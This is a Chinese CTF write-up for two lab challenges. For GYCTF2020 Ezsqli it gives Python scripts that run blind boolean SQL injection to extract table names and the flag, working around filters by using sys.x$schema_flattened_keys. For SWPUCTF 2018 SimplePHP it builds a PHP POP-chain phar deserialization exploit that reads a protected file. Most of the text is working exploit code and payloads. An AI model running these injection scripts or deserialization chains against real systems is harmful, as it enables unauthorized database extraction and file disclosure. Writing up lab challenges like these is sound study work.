[GYCTF2020]Ezsqli
先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。
import requests
import time
url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/"
flag = ""
payload = "1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})^1"
for i in range(1,100):
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2
while (min_value < max_value):
py = payload.format(i,mid)
data = {"id": py}
r = requests.post(url=url,data=data)
if "Nu1L" in r.text:
min_value = mid + 1
else:
max_value = mid
mid = (min_value + max_value) // 2
if (chr(mid) == " "):
break
flag += chr(mid)
print(flag)
time.sleep(0.5)
爆出来表名是f1ag_1s_h3r3_hhhhh,但是information.schema被过滤以后我们没法像之前一样继续爆列名。但我们知道了表名所以可以用ascii位偏移比较字符串来获取表的内容。(select 1,"{}")
是因为flag在f1ag_1s_h3r3_hhhhh的第二列,可以从(select 1,1)
,(select 1,1,1)
试出来。
同样加入sleep避免请求太快出错。
import requests
import time
url = 'http://67e56c51-dad1-4cd9-b205-91d106ccf701.node4.buuoj.cn:81/'
def add(flag):
res = ''
res += flag
return res
flag = ''
for i in range(1,200):
for char in range(32, 127):
hexchar = add(flag + chr(char))
payload = '1^((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))^1'.format(hexchar)
print(payload)
time.sleep(0.1)
data = {'id':payload}
r = requests.post(url=url, data=data)
text = r.text
if 'Nu1L' in r.text:
flag += chr(char-1)
print(flag)
break
爆出来的FLAG是大写,但是buu上提交的得是小写,用lower函数转换一下就好了。
通过文件查看漏洞看一下index.php,直接看flag.php是不行的。再看base.php,继续看file.php和upload_file.php,陆续找到function.php,class.php
[SWPUCTF 2018]SimplePHP
<?php
class C1e4r
{
public $test;
public $str;
public function __construct($name)
{
$this->str = $name;
}
public function __destruct()
{
$this->test = $this->str;
echo $this->test;
}
}
class Show
{
public $source;
public $str;
public function __construct($file)
{
$this->source = $file; //$this->source = phar://phar.jpg
echo $this->source;
}
public function __toString()
{
$content = $this->str['str']->source;
return $content;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}
class Test
{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}
public function __get($key)
{
return $this->get($key);
}
public function get($key)
{
if(isset($this->params[$key])) {
$value = $this->params[$key];
} else {
$value = "index.php";
}
return $this->file_get($value);
}
public function file_get($value)
{
$text = base64_encode(file_get_contents($value));
return $text;
}
}
?>
上传phar文件,构造pop链:C1e4r->__destruct()——>Show->__toString()——>Test->__get()->get()->file_get()
<?php
class C1e4r
{
public $test;
public $str;
}
class Show
{
public $source;
public $str;
}
class Test
{
public $file;
public $params;
}
$a = new C1e4r();
$b = new Show();
$c = new Test();
$c->params['source'] = "/var/www/html/f1ag.php";//目标文件
$a->str = $b; //触发__tostring
$b->str['str'] = $c; //触发__get;
$phar = new Phar("exp.phar"); //生成phar文件
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($a); //触发头是C1e4r类
$phar->addFromString("exp.txt", "test"); //生成签名
$phar->stopBuffering();
?>
上传成功后本来应该是要md5算文件名的,但是直接看upload好像就能看到文件目录,也不知道是预期还是非预期。
复制文件名在file.php用phar协议访问,得到base64加密字符串,解码得到flag。